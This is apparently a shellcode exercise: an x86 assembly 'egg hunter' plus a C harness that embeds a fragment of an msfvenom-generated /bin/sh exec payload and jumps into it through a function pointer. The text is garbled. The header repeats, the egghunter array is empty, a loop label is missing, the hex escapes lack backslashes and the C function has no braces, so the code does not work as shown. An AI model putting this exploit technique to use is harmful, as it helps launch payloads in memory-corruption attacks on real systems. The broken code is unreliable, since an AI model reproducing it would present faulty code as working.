// Description: a 18 bytes egg hunter on contigous memory segments
// You are free to do whatever you want of this shellcode
// @phackt_ul
global _start // Description: a 18 bytes egg hunter on contigous memory segments
// You are free to do whatever you want of this shellcode
// @phackt_ul
global _start

section .text

mov eax, _start ; we set a valid .text address into eax
mov ebx, dword 0x50905091 ; we can avoid an 8 bytes tag in egg if the tag
dec ebx ; can not be found in the egg hunter, that's why we decrement to look for
; 0x50905090 - push eax, nop, push eax, nop


inc eax
cmp dword [eax], ebx ; do we found the tag ?
jne next_addr
jmp eax ; yes we do so we jump to the egg
#include <stdio.h>
#include <string.h>

unsigned char egghunter[] =

unsigned char egg[] =
"x90x50x90x50" // egg mark - do not remove
"xbdx64xb2x0cxf4xdaxc2xd9x74x24xf4x5ax31xc9xb1" // msfvenom -p linux/x86/exec CMD=/bin/sh -f c -b x00

void main()

printf("Egg hunter shellcode Length: %d ", strlen(egghunter));
printf("Egg shellcode Length: %d ", strlen(egg));

int (*ret)() = (int(*)())egghunter;

